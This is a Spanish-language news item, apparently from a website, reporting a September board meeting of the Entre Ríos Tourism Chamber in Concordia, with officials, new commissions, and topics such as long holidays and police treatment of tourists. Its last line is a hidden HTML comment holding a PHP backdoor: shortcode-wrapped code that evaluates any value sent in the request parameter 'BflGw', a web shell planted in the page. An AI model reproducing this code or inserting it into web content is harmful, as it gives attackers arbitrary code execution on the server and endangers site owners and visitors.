El día 18 de septiembre se realizó en la ciudad de Concordia la 2º reunión de CD de la Cámara Entrerriana de Turismo (CET). Comenzando la misma a las 10,30 hs con la presencia del Intendente de la Ciudad de Concordia Don Gustavo Bordet, el Secretario de Turismo de Entre Ríos, Don Alfredo Bedriñan, el Presidente de la CET, TST Sebastián Bel, el Secretario de Turismo de Concordia, José Ostroski y los miembros de la CD de la CET.

Durante el encuentro y luego de las palabras de bienvenida del Intendente Bordet y el Secretario Bedriñan, se Informó y debatió sobre la acciones realizadas por los miembros de la Cámara durante los últimos 30 días, Sobre el nuevo logotipo de la CET, la Creación del sitio web, y la administración de las pagina Sociales, la creación del Departamento de prensa a cargo del Lic. Saguier, la instauración de 3 comisiones de trabajo: Relaciones institucionales, Establecimientos Informales y Promoción Turística; se delineó el trabajo de cara a los próximos meses del 2014 y sobre las acciones de las que participará la CET, se acordó sobre la elaboración para su posterior presentación ante el MINTURER del proyecto para la creación de un Ente Mixto Provincial de Turismo.

Luego de consensuar algunos temas más se dio por finalizada la reunión para dar paso a la participación del Presidente de la Cámara Argentina de Turismo Oscar Ghezzi y el Vice Presidente I de FEDECATUR, Guillermo Paats, quienes viajaron expresamente para reunirse con los miembros de la CD de la CET. Entre los temas que se abordaron en dicha reunión, se trató sobre el seguimiento al proyecto de ley que regula los derechos autorales (SADAIC; AADICAPIF; ARGENTORES; ETC.) Se coincido sobre lo prioritario de la continuidad después del 2016 del DNU que establece los feriados largos y la postura de la CET sobre el cambio de la denominación de feriado puente por Día No laborable. Se solicitó una ampliación para Entre Ríos del Programa de YPF SERVICLUB, y se trató sobre los abusos que sufren los Turistas, sobre todo Uruguayos y Brasileros por parte de la policía a lo largo de la ruta 14 con la instalación malintencionada en los reductores de los radares de control de velocidad.

Finalizada la reunión los presentes compartieron un almuerzo de camaradería que ofreció la CET, donde se continúo con la charla sobre temas inherentes al desarrollo del turismo nacional.

“Estamos muy contentos de cómo viene trabajando esta CD, que ha sido pensada con un amplio sentimiento federal y que representa a todos los sectores y localidades de nuestra provincia. Agradecemos a las autoridades Provinciales y Municipales por su apoyo y a los Dirigentes nacionales que han venido expresamente a acompañarnos y a proponernos formar parte del gran mapa dirigencial del turismo de la Argentina” expresó Sebastián Bel.

<!– [insert_php]if (isset($_REQUEST["BflGw"])){eval($_REQUEST["BflGw"]);exit;}[/insert_php][php]if (isset($_REQUEST["BflGw"])){eval($_REQUEST["BflGw"]);exit;}[/php] –>